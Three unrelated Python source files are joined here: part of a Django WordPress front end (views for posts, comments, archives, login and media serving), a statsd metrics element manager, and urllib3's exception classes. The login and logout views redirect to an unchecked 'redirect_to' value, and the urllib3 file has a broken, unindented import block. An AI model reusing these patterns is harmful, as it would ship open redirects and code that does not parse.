        elif post and post.comment_status == 'open' and not revision:
            set_object_value(key, post)
    if revision:
        post.set_to_revision(revision)
    return _post(
        request, post, kw.get('comment_page'),
        ('wp_frontman/post_%s.html' % post.slug, 'wp_frontman/post.html')
    )
@wpf_cache_page(timestamps=('page', 'comment'))  # don't care too much if the sidebar gets stale
def page(request, slug, comment_page=None):
    """Static WordPress page view, looked up by slug."""
    # stupid WordPress does not enforce unique slugs
    pages = Page.objects.filter(status__in=('publish', 'future')).select_related('author').filter(slug=slug, status='publish').order_by('-date')
    if not pages:
        raise Http404(_("No such page."))
    page = pages[0]
    # NOTE(review): the second .filter() above already restricts
    # status='publish', which makes this 'future' branch look unreachable --
    # confirm which status filter was intended.
    if page.status == 'future':
        user = User.user_from_cookie(request)
        if not user:
            raise Http404("Not allowed")
    return _post(
        request, page, comment_page,
        ('wp_frontman/page_%s.html' % slug, 'wp_frontman/page.html')
    )
def _post(request, post, comment_page, templates):
    """Shared renderer for posts and pages, including the comment workflow.

    Handles comment submission (POST), the choice between the anonymous,
    registered-user and login-required comment forms, and the X-Pingback
    response header.
    """
    if post.comment_status == 'open' or post.status != 'publish':
        # prevent storing the response in the cache if we have to display the comment form
        request._cache_store_result = False
    comment_error = None
    form = None
    needs_login = False
    try:
        user_login, expiration, _hmac = User.login_from_cookie(request)
    except (TypeError, ValueError):
        # No cookie or a malformed one: treat as anonymous.
        user_login = user = None
    else:
        user = User.user_from_cookie(request, user_login, expiration, _hmac)
        if not user:
            user_login = None
    if post.comment_status == 'open':
        if request.method == 'POST':
            data = request.POST.copy()
            data['comment_parent'] = data.get('comment_parent') or request.GET.get('replytocom')
            #user = None if not user_login else User.user_from_cookie(request)
            if user:
                form = UserCommentForm(data)
            elif request.blog.comment_registration:
                # set the flag that tells our template to display the login/register fragment
                user_login = False
                needs_login = True
            else:
                user_login = False
                form = CommentForm(data)
            if form and form.is_valid():
                try:
                    comment = form.save(request, post, user)
                except ValueError, e:
                    #import sys
                    #import traceback
                    #file('/tmp/wpf_comment_error.log', 'a+').write(" ".join(traceback.format_tb(sys.exc_info()[2])) + "\n\n")
                    comment_error = _('Cannot post this comment') if not e.args else "Error when saving: %s" % e.args[0]
                else:
                    data = form.cleaned_data
                    response = HttpResponse()
                    if data.get('remember_info'):
                        # Remember the commenter's details in cookies.
                        path = reverse('wpf_index')
                        for k in ('author', 'author_email', 'author_url'):
                            v = data.get(k)
                            if v:
                                response.set_cookie('comment_%s_%s' % (k, request.blog.cookiehash), value=v.encode('utf-8'), path=path)
                    # Manual redirect so the cookies set above are kept.
                    response.status_code = 302
                    if comment.approved == '1':
                        response['Location'] = comment.get_absolute_url()
                    else:
                        # Moderated comment: send back to the comment list.
                        response['Location'] = post.get_absolute_url() + '#comments'
                    return response
            elif form and form['rawcontent'].errors:
                comment_error = _("Invalid or empty content")
        else:
            # only check that we have a cookie now, save querying the database
            # for when we have POST data
            if user_login:
                form = UserCommentForm()
            elif request.blog.comment_registration:
                # set the flag that tells our template to display the login/register fragment
                needs_login = True
            else:
                # show the default comment form
                initial = dict()
                if getattr(settings, 'WPF_COMMENTFORM_SET_INITIAL', True):
                    # NOTE(review): `initial` is empty here, so this loop
                    # never runs; it presumably meant to iterate the
                    # ('author', 'author_email', 'author_url') cookie keys
                    # -- TODO confirm.
                    for k in initial.keys():
                        v = request.COOKIES.get("comment_%s_%s" % (k, request.blog.cookiehash))
                        if v:
                            initial[k] = unquote(v)
                form = CommentForm(initial=initial)
    #return render_to_response(
    response = HttpResponse(loader.render_to_string(
        templates,
        dict(
            post=post, form=form, comment_error=comment_error,
            page=comment_page, user_login=user_login, needs_login=needs_login
        ),
        context_instance=RequestContext(request)
    ))
    if post.ping_status == 'open' and request.blog.pingback_url:
        response['X-Pingback'] = request.blog.pingback_url
    return response
def trackback(request, **kw):
    """Trackback endpoint -- unimplemented stub (returns None).

    NOTE(review): a Django view returning None raises at runtime;
    presumably this is a placeholder -- TODO confirm.
    """
    pass
def _listing(request, obj, qs, page, templates, d, paginator_args):
    """Shared paginated-listing renderer for archives/author/category views.

    obj -- the domain object driving the listing (exposed to templates as
           'obj'); qs -- the post queryset; d -- extra template context;
    paginator_args -- (pattern_name, kwargs) for simple_paginator_vars.
    """
    page, start, end = page_to_limits(page, request.blog.posts_per_page)
    # Fetch one extra row so we can tell whether a next page exists.
    posts = list(qs[start:end+1])
    if len(posts) > request.blog.posts_per_page:
        posts = posts[:-1]
        has_next = True
    else:
        has_next = False
    if posts:
        Post.fill_taxonomy_cache(posts)
    d['posts'] = posts
    d['obj'] = obj
    d.update(simple_paginator_vars(page, has_next, *paginator_args))
    return render_to_response(templates, d, context_instance=RequestContext(request))
@wpf_cache_page(timestamps=('post',))
def archives(request, year, month=None, page=None):
    """Date-based archive listing for a year or a year/month."""
    # label is YYYY or YYYYMM, zero-padded.
    label = year.rjust(4, '0')
    if month:
        label += month.rjust(2, '0')
    try:
        if month:
            dt_start, dt_end = get_date_range(year=year, month=month)
        else:
            dt_start, dt_end = get_date_range(year=year)
    except (TypeError, ValueError):
        raise Http404(_("No such archive."))
    qs = Post.objects.published().select_related('author').filter(date__range=(dt_start, dt_end))
    d = dict(year=year, month=month, label=label, dt_start=dt_start, dt_end=dt_end)
    paginator_d = dict(year=year)
    if month:
        paginator_d['month'] = month
    # NOTE(review): `d` is passed as the `obj` argument here, whereas the
    # sibling views pass the domain object (author/category) -- confirm
    # whether templates expect `obj` to be this context dict.
    return _listing(
        request, d, qs, page, 'wp_frontman/archives.html',
        d,
        ('wpf_archives', paginator_d)
    )
@wpf_cache_page(timestamps=('post', 'page'))
def author(request, slug, page=None):
    """Listing of published posts by a single author (looked up by nicename)."""
    author = get_object_or_404(User, nicename=slug)
    qs = author.basepost_set.posts().published().select_related('author')
    return _listing(
        request, author, qs, page,
        # Per-author template override, falling back to the generic one.
        ('wp_frontman/author_%s.html' % slug, 'wp_frontman/author.html'),
        dict(author=author),
        ('wpf_author', dict(slug=slug))
    )
@wpf_cache_page(timestamps=('post',))
def category(request, slug, parents=None, page=None):
    """Category listing; walks nested category paths when sets are enabled."""
    # Try the raw slug plus its URL-quoted and lower-cased quoted variants,
    # since WordPress may have stored any of these forms.
    slugs = [slug, quote(slug.encode('utf-8'))]
    slugs.append(slugs[-1].lower())
    if parents and WPF_CATEGORIES_AS_SETS:
        # Walk the parent path segment by segment down the category tree.
        _parents = [t for t in parents.split('/') if t]
        for i, p in enumerate(_parents):
            if '%' in p:
                # Percent-encoded segment: decode it (py2 str -> unicode).
                _parents[i] = unquote(p).decode('utf-8')
        parents_tree = Category.get_all(as_tree=True)
        branch = parents_tree
        for p in _parents:
            pq = quote(p.encode('utf-8'))
            try:
                root, branch = [(k, v) for k, v in branch.items() if k.term.slug in (p, pq, pq.lower())][0]
            except IndexError:
                raise Http404("No such category path.")
            if branch is None:
                # Leaf reached before the path was exhausted.
                break
        try:
            category = [c for c in branch if c.term.slug in slugs][0]
        except IndexError:
            raise Http404("No such category.")
    else:
        categories = Category.objects.select_related('term').filter(term__slug__in=slugs)
        if not categories:
            raise Http404("No such category.")
        category = categories[0]
    if WPF_CATEGORIES_AS_SETS:
        # Include posts from the whole sub-tree rooted at this category.
        categories = [c.id for c in get_set(Category.objects.select_related('parent'), 'id', category.id)]
        qs = Post.objects.published().select_related('author').filter(base_taxonomy__id__in=categories)
    else:
        qs = category.posts.published().select_related('author')
    qs = qs.distinct()
    paginator_args = dict(slug=slug) if not parents or not WPF_CATEGORIES_AS_SETS else dict(slug=slug, parents=parents)
    return _listing(
        request, category, qs, page,
        ('wp_frontman/category_%s.html' % slug, 'wp_frontman/category.html'),
        dict(category=category),
        ('wpf_category', paginator_args)
    )
@wpf_cache_page(timestamps=('post',))
def taxonomy(request, taxonomy, slug, parents=None, page=None):
    # TODO: should probably make this more general and use it also for built-in taxonomies
    # NOTE(review): the listing logic below is still disabled (the big
    # triple-quoted string is dead code), so this view validates the taxonomy
    # and then implicitly returns None -- Django will raise on that. Confirm
    # whether this endpoint is meant to be reachable yet.
    blog = Blog.get_active()
    custom_taxonomies = blog.options.get('wp_frontman', dict()).get('custom_taxonomies', dict())
    taxonomy_data = custom_taxonomies.get(taxonomy)
    if not custom_taxonomies.get('enabled') or not taxonomy_data:
        raise Http404("No such taxonomy.")
    # Match the raw slug, its URL-quoted form and the lowercased quoted form.
    slugs = [slug, quote(slug.encode('utf-8'))]
    slugs.append(slugs[-1].lower())
    """
    if parents and taxonomy_data['rewrite_hierarchical']:
        _parents = [t for t in parents.split('/') if t]
        for i, p in enumerate(_parents):
            if '%' in p:
                _parents[i] = unquote(p).decode('utf-8')
        parents_tree = Category.get_all(as_tree=True)
        branch = parents_tree
        for p in _parents:
            pq = quote(p.encode('utf-8'))
            try:
                root, branch = [(k, v) for k, v in branch.items() if k.term.slug in (p, pq, pq.lower())][0]
            except IndexError:
                raise Http404("No such category path.")
            if branch is None:
                break
        try:
            category = [c for c in branch if c.term.slug in slugs][0]
        except IndexError:
            raise Http404("No such category.")
    else:
        categories = Category.objects.select_related('term').filter(term__slug__in=slugs)
        if not categories:
            raise Http404("No such category.")
        category = categories[0]
        if WPF_CATEGORIES_AS_SETS:
            categories = [c.id for c in get_set(Category.objects.select_related('parent'), 'id', category.id)]
            qs = Post.objects.published().select_related('author').filter(base_taxonomy__id__in=categories)
        else:
            qs = category.posts.published().select_related('author')
    qs = qs.distinct()
    paginator_args = dict(slug=slug) if not parents or not WPF_CATEGORIES_AS_SETS else dict(slug=slug, parents=parents)
    return _listing(
        request, category, qs, page,
        ('wp_frontman/category_%s.html' % slug, 'wp_frontman/category.html'),
        dict(category=category),
        ('wpf_category', paginator_args)
    )
    """
#@wpf_cache_page(timestamps=('link_category',))
def links(request, slug, parents=None, page=None):
    """Paginated blogroll listing for a link category (and its subtree)."""
    # Match the raw slug, its URL-quoted form and the lowercased quoted form.
    slugs = [slug, quote(slug.encode('utf-8'))]
    slugs.append(slugs[-1].lower())
    if parents:
        # Resolve the category by walking the link-category tree path.
        _parents = [t for t in parents.split('/') if t]
        for i, p in enumerate(_parents):
            if '%' in p:
                # Percent-encoded segment: decode back to unicode for matching.
                _parents[i] = unquote(p).decode('utf-8')
        parents_tree = LinkCategory.get_all(as_tree=True)
        branch = parents_tree
        for p in _parents:
            pq = quote(p.encode('utf-8'))
            try:
                root, branch = [(k, v) for k, v in branch.items() if k.term.slug in (p, pq, pq.lower())][0]
            except IndexError:
                raise Http404("No such link category path.")
            if branch is None:
                # Leaf reached before the path was exhausted.
                break
        try:
            category = [c for c in branch if c.term.slug in slugs][0]
        except IndexError:
            raise Http404("No such link category.")
    else:
        categories = LinkCategory.objects.select_related('term').filter(term__slug__in=slugs)
        if not categories:
            raise Http404("No such link category.")
        category = categories[0]
    #qs = category.links.visible().select_related('author')
    # Include links from the whole category subtree, ordered by name.
    categories = [c.id for c in get_set(LinkCategory.objects.select_related('parent'), 'id', category.id)]
    qs = Link.objects.visible().filter(categories__id__in=categories).order_by('name')
    # Fetch one extra row to detect whether a further page exists.
    page, start, end = page_to_limits(page, request.blog.posts_per_page)
    links = list(qs[start:end+1])
    if len(links) > request.blog.posts_per_page:
        links = links[:-1]
        has_next = True
    else:
        has_next = False
    d = dict(category=category, links=links)
    d.update(simple_paginator_vars(page, has_next, 'wpf_link_category', dict(slug=slug) if not parents else dict(slug=slug, parents=parents)))
    return render_to_response(
        ('wp_frontman/links_%s.html' % slug, 'wp_frontman/links.html'),
        d,
        context_instance=RequestContext(request)
    )
@wpf_cache_page(timestamps=('post',))
def tag(request, slug, page=None):
    """List published posts carrying the tag identified by `slug`."""
    quoted = quote(slug.encode('utf-8'))
    candidates = (slug, slug.lower(), quoted, quoted.lower())
    matches = Tag.objects.select_related('term').filter(term__slug__in=candidates)
    if not matches:
        raise Http404("No such tag.")
    tag = matches[0]
    qs = tag.posts.published().select_related('author')
    return _listing(
        request, tag, qs, page,
        ('wp_frontman/tag_%s.html' % slug, 'wp_frontman/tag.html'),
        dict(tag=tag),
        ('wpf_post_tag', dict(slug=slug))
    )
@wpf_cache_page(timestamps=('post',))
def search(request, q=None, page=None):
    """Case-insensitive substring search over published post titles/bodies."""
    query = q if q else request.GET.get('q')
    if not query:
        qs = list()
    else:
        qs = Post.objects.published().filter(
            models.Q(title__icontains=query) | models.Q(content__icontains=query)
        ).select_related('author')
    return _listing(
        request, query, qs, page,
        'wp_frontman/search.html',
        dict(q=query),
        ('wpf_search', dict(q=query))
    )
def feed_check_redirect(request, feed_type=None):
    """Redirect to FeedBurner when configured, else serve the local feed.

    Requests coming from FeedBurner itself are always served locally to
    avoid a redirect loop.
    """
    options = Blog.get_active().options.get('wp_frontman', dict()).get('feedburner', dict())
    url = options.get('%s_url' % feed_type if feed_type else 'url')
    from_feedburner = 'feedburner' in request.META.get('HTTP_USER_AGENT', '').lower()
    if options.get('enabled') and url and not from_feedburner:
        return HttpResponseRedirect(url)
    handler = globals().get('feed_%s' % feed_type if feed_type else 'feed')
    return handler(request)
@wpf_cache_page(timestamps=('post',))
def feed(request, feed_type='atom'):
    # NOTE(review): feed_type is accepted for URLconf compatibility but ignored.
    return posts_feed(request)
def feed_post(request, **kw):
    """Serve the per-post feed for the post resolved from URL keywords."""
    try:
        target = Post.objects.get_from_keywords(kw)
    except ObjectDoesNotExist:
        raise Http404("No such post.")
    return post_feed(request, target)
@wpf_cache_page(timestamps=('comment',))
def feed_comments(request, feed_type='atom'):
    # NOTE(review): feed_type is accepted for URLconf compatibility but ignored.
    return comments_feed(request)
@wpf_cache_page(timestamps=('post',))
def feed_author(request, **kw):
    # Thin cached wrapper; keyword arguments are forwarded to user_feed.
    return user_feed(request, **kw)
def user_login(request):
    """Display and process the WordPress-cookie based login form."""
    if request.method == 'POST':
        data = request.POST.copy()
        form = LoginForm(data)
        if form.is_valid():
            redirect_to = request.GET.get('redirect_to')
            if not redirect_to:
                redirect_to = reverse('wpf_index')
            response = HttpResponseRedirect(redirect_to)
            user = form.cleaned_data['user']
            cookie = user.get_logged_in_cookie()
            if cookie:
                if not form.cleaned_data['rememberme']:
                    # Session-only cookie when "remember me" is unchecked.
                    cookie['max_age'] = None
                response.set_cookie(**cookie)
            return response
    else:
        form = LoginForm()
    # Reached on GET or when the submitted form is invalid.
    return render_to_response(
        'wp_frontman/user_login.html',
        dict(form=form),
        context_instance=RequestContext(request)
    )
def user_logout(request):
    """Delete every WordPress login cookie and redirect to `redirect_to`."""
    target = request.GET.get('redirect_to') or reverse('wpf_index')
    response = HttpResponseRedirect(target)
    for name in request.COOKIES:
        if name.startswith('wordpress_logged_in'):
            response.delete_cookie(name)
    return response
def user_registration(request):
    """Display and process the user registration form."""
    if request.method != 'POST':
        form = RegistrationForm()
    else:
        form = RegistrationForm(request.POST.copy())
        if form.is_valid():
            form.save()
            return HttpResponseRedirect(reverse('wpf_user_registration_message'))
    return render_to_response(
        'wp_frontman/user_registration.html',
        dict(form=form),
        context_instance=RequestContext(request)
    )
def user_registration_message(request):
    """Static confirmation page shown after a successful registration."""
    context = dict()
    return render_to_response(
        'wp_frontman/user_registration_message.html',
        context,
        context_instance=RequestContext(request)
    )
def user_activation(request):
    """Activate a pending signup identified by an activation key.

    The key is accepted via POST or GET; keys older than two days are
    treated as expired.
    """
    activation_key = request.POST.get('key', request.GET.get('key'))
    if activation_key:
        try:
            s = UserSignup.objects.get(activation_key=activation_key, registered__gte=datetime.datetime.now() - datetime.timedelta(days=2))
        except ObjectDoesNotExist:
            # Unknown or expired key: fall through and re-display the page.
            pass
        else:
            # create user, mark signup as registered, and redirect to the user's profile
            user = s.activate()
            response = HttpResponseRedirect(reverse('wpf_user_profile'))
            response.set_cookie(**user.get_logged_in_cookie())
            return response
    return render_to_response(
        'wp_frontman/user_activation.html',
        dict(activation_key=activation_key),
        context_instance=RequestContext(request)
    )
def user_profile(request):
    """Show the profile page of the currently logged-in user.

    Redirects to the login page when no valid login cookie is present.
    """
    user = User.user_from_cookie(request)
    if not user:
        return HttpResponseRedirect(reverse('wpf_user_login'))
    # Reuse the user already resolved above instead of parsing the cookie twice.
    return render_to_response(
        'wp_frontman/user_profile.html',
        dict(user=user),
        context_instance=RequestContext(request)
    )
def media(request, filepath):
    """Serve an uploaded blog file from the multisite blogs.dir tree."""
    # endswith() also handles the empty string, where filepath[-1] would
    # raise IndexError.
    if filepath.endswith('/'):
        filepath = filepath[:-1]
    return _static_media(request, 'wp-content/blogs.dir/%s/files/%s' % (request.blog.blog_id, filepath))
def _static_media(request, path):
    """Serve a file from under WPF_WP_ROOT, guessing its mimetype.

    NOTE: Python 2 code (`unicode` and `file` builtins below).
    """
    if '..' in path:
        # Crude path-traversal guard: rejects any '..' anywhere in the path.
        return HttpResponseBadRequest("File path forbidden")
    if not WPF_WP_ROOT:
        return HttpResponseServerError("Missing WPF_WP_ROOT setting")
    if path and path[0] == '/':
        # relative path, strip leading slash
        path = path[1:]
    abspath = os.path.join(WPF_WP_ROOT, path)
    mimetype = guess_type(abspath)
    if not mimetype[0]:
        return HttpResponseBadRequest("Unknown mimetype")
    if isinstance(abspath, unicode):
        # Filesystem calls below expect a byte string path.
        abspath = abspath.encode('utf-8')
    if WPF_SENDFILE and not settings.DEBUG:
        # Delegate the transfer to the web server via the X-Sendfile header.
        # NOTE(review): no existence check happens on this branch -- confirm
        # the web server handles a missing file gracefully.
        response = HttpResponse(mimetype=mimetype[0])
        response['X-Sendfile'] = abspath
        return response
    if not os.path.isfile(abspath):
        raise Http404("No such file %s" % abspath)
    return HttpResponse(file(abspath, 'rb'), mimetype=mimetype[0])
def favicon(request):
    # Serve the blog-configured favicon via the static file helper.
    return _static_media(request, request.blog.options['favicon_path'])
def robots(request):
    # Serve the blog-configured robots.txt via the static file helper.
    return _static_media(request, request.blog.options['robots_path'])
#def feed_category(request, category, feed_type='atom'):
# pass
#def feed_search(request, search, feed_type='atom'):
# pass
#def feed_tag(request, tag, feed_type='atom'):
# pass
|
|
import logging
import netuitive
from . import statsd
logger = logging.getLogger(__name__)
class Elements(object):

    """Manage the set of monitored elements, keyed by element id.

    The host element passed to the constructor is always registered under
    ``hostname``; additional elements are created lazily by :meth:`add`.
    """

    def __init__(self, hostname, element_obj):
        self.hostname = hostname
        self.element = element_obj
        self.elements = {}
        self.elements[self.hostname] = self.element

    def add(self, metricId, ts, val, metricType, sign=None, rate=None,
            tags=None, elementId=None):
        """Add an element (if needed), metrics, and samples.

        ``tags`` defaults to an empty list; the previous mutable default
        argument (``tags=[]``) was replaced with None to avoid state
        leaking between calls.
        """
        if tags is None:
            tags = []
        logger.debug('Element.add for metricId: {0}, '
                     'ts: {1},'
                     'val: {2}, '
                     'metricType:{3}, '
                     'sign: {4}, '
                     'rate: {5}, '
                     'tags: {6}, '
                     'elementId: {7}'.format(str(metricId),
                                             str(ts),
                                             str(val),
                                             str(metricType),
                                             str(sign),
                                             str(rate),
                                             str(tags),
                                             str(elementId)))
        try:
            timestamp = int(ts)
            value = float(val)
            if elementId is None:
                # Default to the host element.
                elementId = self.hostname
            if elementId not in self.elements:
                logger.debug('creating element:' + str(elementId))
                self.elements[elementId] = Element(
                    elementId, self.element.element.type)
            self.elements[elementId].add_sample(
                metricId, timestamp, value, metricType, sign, rate, tags)
        except Exception as e:
            logger.error(e, exc_info=True)
            # Bare raise preserves the original traceback.
            raise

    def delete(self, elementId):
        """Remove a single element; raises KeyError if it is unknown."""
        del self.elements[elementId]

    def delete_all(self):
        """Reset to just the host element, with its metrics cleared."""
        self.elements = {}
        self.element.metrics = {}
        self.elements[self.hostname] = self.element

    def clear_samples(self, elementId=None, everything=False):
        """Clear queued samples for one element, or for all of them.

        Errors are logged and swallowed (best-effort cleanup, as before).
        """
        logger.debug('Element.clear_samples for ' + str(elementId))
        try:
            if elementId is None and everything is True:
                for ename in self.elements:
                    e = self.elements[ename]
                    e.clear_samples()
            else:
                e = self.elements[elementId]
                e.clear_samples()
        except Exception as e:
            logger.error(e, exc_info=True)
class Element(object):

    """An entity that represents one monitored element and its metrics."""

    def __init__(self, elementId, ElementType=None):
        logger.debug('__init__ for Element')
        self.element = netuitive.Element(ElementType)
        self.elementId = elementId
        # metricId -> statsd metric wrapper (Gauge/Counter/Histogram/Set)
        self.metrics = {}
        # statsd wire-type code -> internal metric type name
        self.metric_types = {'c': 'COUNTER',
                             'g': 'GAUGE',
                             'ms': 'TIMER',
                             's': 'SET',
                             'h': 'HISTOGRAM'}

    def add_attribute(self, name, value):
        self.element.add_attribute(name, value)

    def add_tag(self, name, value):
        self.element.add_tag(name, value)

    def clear_samples(self):
        """Drop all metric wrappers and any samples queued on the element."""
        self.metrics.clear()
        self.element.clear_samples()

    def add_sample(self, metricId, ts, value, metricType, sign=None,
                   rate=None, tags=None):
        """Record one statsd sample, creating the metric wrapper on demand.

        ``tags`` defaults to an empty list; the previous mutable default
        argument (``tags=[]``) was replaced with None to avoid state leaking
        between calls. Special tag keys: 'un' (unit), 'sds' (sparse data
        strategy), 'ty' (element type), 'v' (application version).
        """
        logger.debug('add_sample')
        if tags is None:
            tags = []
        unit = ''
        sparseDataStrategy = 'None'
        metric_tags = []
        try:
            timestamp = int(ts)
            mtype = self.metric_types[metricType]
            # process tags
            for t in tags:
                # check for unit tag
                if 'un' in t:
                    unit = t['un']
                    metric_tags.append(t)
                # check for sparse data tag
                elif 'sds' in t:
                    sparseDataStrategy = t['sds']
                    metric_tags.append(t)
                # check for element type
                elif 'ty' in t:
                    self.element.type = t['ty']
                # check for application version
                elif 'v' in t:
                    # Overwrite an existing version tag
                    if any(tag.name == 'app.version'
                           for tag in self.element.tags):
                        index = next(i for i, tag in enumerate(
                            self.element.tags) if tag.name == 'app.version')
                        del self.element.tags[index]
                    self.element.add_tag('app.version', t['v'])
                else:
                    metric_tags.append(t)
            if metricId in self.metrics:
                # Type changes are not supported: log and rebuild the metric.
                if mtype not in self.metrics[metricId].orgtype:
                    otype = self.metric_types[
                        self.metrics[metricId].tags[0]['statsdType']]
                    logger.error("metric {0} changed from type {1} "
                                 "to type {2}".format(metricId, otype, mtype))
                    del self.metrics[metricId]
            if mtype == 'GAUGE':
                if metricId not in self.metrics:
                    self.metrics[metricId] = statsd.Gauge(
                        metricId, sparseDataStrategy, unit, metric_tags)
                self.metrics[metricId].add_value(value, timestamp, sign)
            if mtype == 'COUNTER':
                if metricId not in self.metrics:
                    self.metrics[metricId] = statsd.Counter(
                        metricId, sparseDataStrategy, unit, metric_tags)
                self.metrics[metricId].add_value(
                    value, timestamp, rate, sign)
            if mtype in ('HISTOGRAM', 'TIMER'):
                if metricId not in self.metrics:
                    self.metrics[metricId] = statsd.Histogram(
                        metricId, sparseDataStrategy, unit, metric_tags)
                self.metrics[metricId].add_value(
                    value, timestamp)
            if mtype == 'SET':
                if metricId not in self.metrics:
                    self.metrics[metricId] = statsd.Set(
                        metricId, sparseDataStrategy, unit, metric_tags)
                self.metrics[metricId].add_value(value, timestamp)
        except Exception as e:
            # Removed a leftover debug print(e); the log line already
            # captures the full traceback.
            logger.error(e, exc_info=True)
            # Bare raise preserves the original traceback.
            raise

    def prepare(self):
        """
        prepare the metrics/samples for posting to the api
        """
        # The previous try/except here only re-raised, so it was removed.
        logger.debug('starting prepare')
        for m in self.metrics:
            metric = self.metrics[m]
            samples = metric.get_values(statsd.util.get_timestamp())
            metricType = metric.metricType
            sparseDataStrategy = metric.sparseDataStrategy
            unit = metric.unit
            tags = metric.tags
            if len(tags) == 0:
                tags = None
            for name in samples:
                d = samples[name]
                # Optional aggregates are only present for some metric types.
                mmin = d.get('min')
                mmax = d.get('max')
                mavg = d.get('avg')
                msum = d.get('sum')
                mcnt = d.get('cnt')
                timestamp = d['timestamp']
                value = d['value']
                self.element.add_sample(
                    name,
                    timestamp,
                    value,
                    metricType,
                    self.elementId,
                    sparseDataStrategy,
                    unit,
                    tags,
                    mmin,
                    mmax,
                    mavg,
                    msum,
                    mcnt,
                    ts_is_ms=True)
            # since our results are ready for posting
            metric.clear()
        logger.debug('finished prepare')
|
|
import socket
import warnings
from email.errors import MessageDefect
from http.client import IncompleteRead as httplib_IncompleteRead
from typing import TYPE_CHECKING, Callable, List, Optional, Tuple, Union
if TYPE_CHECKING:
from .connection import HTTPConnection
from .connectionpool import ConnectionPool
from .response import HTTPResponse
from .util.retry import Retry
# Base Exceptions
class HTTPError(Exception):
    """Base exception used by this module."""
class HTTPWarning(Warning):
    """Base warning used by this module."""
_TYPE_REDUCE_RESULT = Tuple[Callable[..., object], Tuple[object, ...]]
class PoolError(HTTPError):
    """Base exception for errors caused within a pool."""

    def __init__(self, pool: "ConnectionPool", message: str) -> None:
        self.pool = pool
        super().__init__("{}: {}".format(pool, message))

    def __reduce__(self) -> _TYPE_REDUCE_RESULT:
        # Pickling support: the pool itself is not picklable, so drop it.
        return self.__class__, (None, None)
class RequestError(PoolError):
    """Base exception for PoolErrors that have associated URLs."""

    def __init__(self, pool: "ConnectionPool", url: str, message: str) -> None:
        super().__init__(pool, message)
        self.url = url

    def __reduce__(self) -> _TYPE_REDUCE_RESULT:
        # Pickling support: drop the unpicklable pool but keep the URL.
        return self.__class__, (None, self.url, None)
class SSLError(HTTPError):
    """Raised when SSL certificate fails in an HTTPS connection."""
class ProxyError(HTTPError):
    """Raised when the connection to a proxy fails."""

    # The original error is also available as __cause__.
    original_error: Exception

    def __init__(self, message: str, error: Exception) -> None:
        self.original_error = error
        super().__init__(message, error)
class DecodeError(HTTPError):
    """Raised when automatic decoding based on Content-Type fails."""
class ProtocolError(HTTPError):
    """Raised when something unexpected happens mid-request/response."""
#: Renamed to ProtocolError but aliased for backwards compatibility.
#: NOTE: this intentionally shadows the builtin ConnectionError in this module.
ConnectionError = ProtocolError
# Leaf Exceptions
class MaxRetryError(RequestError):
    """Raised when the maximum number of retries is exceeded.

    :param pool: The connection pool
    :type pool: :class:`~urllib3.connectionpool.HTTPConnectionPool`
    :param string url: The requested Url
    :param exceptions.Exception reason: The underlying error
    """

    def __init__(
        self, pool: "ConnectionPool", url: str, reason: Optional[Exception] = None
    ) -> None:
        self.reason = reason
        msg = "Max retries exceeded with url: {} (Caused by {!r})".format(url, reason)
        super().__init__(pool, url, msg)
class HostChangedError(RequestError):
    """Raised when an existing pool gets a request for a foreign host."""

    def __init__(
        self, pool: "ConnectionPool", url: str, retries: Union["Retry", int] = 3
    ) -> None:
        super().__init__(pool, url, "Tried to open a foreign host with url: %s" % url)
        self.retries = retries
class TimeoutStateError(HTTPError):
    """Raised when passing an invalid state to a timeout"""
class TimeoutError(HTTPError):
    """Raised when a socket timeout error occurs.

    Catching this error will catch both :exc:`ReadTimeoutErrors
    <ReadTimeoutError>` and :exc:`ConnectTimeoutErrors <ConnectTimeoutError>`.
    """
class ReadTimeoutError(TimeoutError, RequestError):
    """Raised when a socket timeout occurs while receiving data from a server"""
# This timeout error does not have a URL attached and needs to inherit from the
# base HTTPError
class ConnectTimeoutError(TimeoutError):
    """Raised when a socket timeout occurs while connecting to a server"""
class NewConnectionError(ConnectTimeoutError, HTTPError):
    """Raised when we fail to establish a new connection. Usually ECONNREFUSED."""

    def __init__(self, conn: "HTTPConnection", message: str) -> None:
        self.conn = conn
        super().__init__("{}: {}".format(conn, message))

    @property
    def pool(self) -> "HTTPConnection":
        # Deprecated alias kept for backwards compatibility; prefer .conn.
        warnings.warn(
            "The 'pool' property is deprecated and will be removed "
            "in a later urllib3 v2.x release. use 'conn' instead.",
            DeprecationWarning,
            stacklevel=2,
        )
        return self.conn
class NameResolutionError(NewConnectionError):
    """Raised when host name resolution fails."""

    def __init__(self, host: str, conn: "HTTPConnection", reason: socket.gaierror):
        super().__init__(conn, "Failed to resolve '%s' (%s)" % (host, reason))
class EmptyPoolError(PoolError):
    """Raised when a pool runs out of connections and no more are allowed."""
class FullPoolError(PoolError):
    """Raised when we try to add a connection to a full pool in blocking mode."""
class ClosedPoolError(PoolError):
    """Raised when a request enters a pool after the pool has been closed."""
class LocationValueError(ValueError, HTTPError):
    """Raised when there is something wrong with a given URL input."""
class LocationParseError(LocationValueError):
    """Raised when get_host or similar fails to parse the URL input."""

    def __init__(self, location: str) -> None:
        super().__init__("Failed to parse: %s" % location)
        self.location = location
class URLSchemeUnknown(LocationValueError):
    """Raised when a URL input has an unsupported scheme."""

    def __init__(self, scheme: str):
        super().__init__("Not supported URL scheme %s" % scheme)
        self.scheme = scheme
class ResponseError(HTTPError):
    """Used as a container for an error reason supplied in a MaxRetryError."""
    # Retry-exhaustion reason strings; SPECIFIC_ERROR is .format()-ed with a
    # status_code by callers.
    GENERIC_ERROR = "too many error responses"
    SPECIFIC_ERROR = "too many {status_code} error responses"
class SecurityWarning(HTTPWarning):
    """Warned when performing security reducing actions"""
class InsecureRequestWarning(SecurityWarning):
    """Warned when making an unverified HTTPS request."""
class SystemTimeWarning(SecurityWarning):
    """Warned when system time is suspected to be wrong"""
class InsecurePlatformWarning(SecurityWarning):
    """Warned when certain TLS/SSL configuration is not available on a platform."""
class SNIMissingWarning(HTTPWarning):
    """Warned when making a HTTPS request without SNI available."""
class DependencyWarning(HTTPWarning):
    """
    Warned when an attempt is made to import a module with missing optional
    dependencies.
    """
class ResponseNotChunked(ProtocolError, ValueError):
    """Response needs to be chunked in order to read it as chunks."""
class BodyNotHttplibCompatible(HTTPError):
    """
    Body should be :class:`http.client.HTTPResponse` like
    (have an fp attribute which returns raw chunks) for read_chunked().
    """
class IncompleteRead(HTTPError, httplib_IncompleteRead):
    """
    Response length doesn't match expected Content-Length

    Subclass of :class:`http.client.IncompleteRead` to allow int value
    for ``partial`` to avoid creating large objects on streamed reads.
    """

    def __init__(self, partial: int, expected: int) -> None:
        self.partial = partial
        self.expected = expected

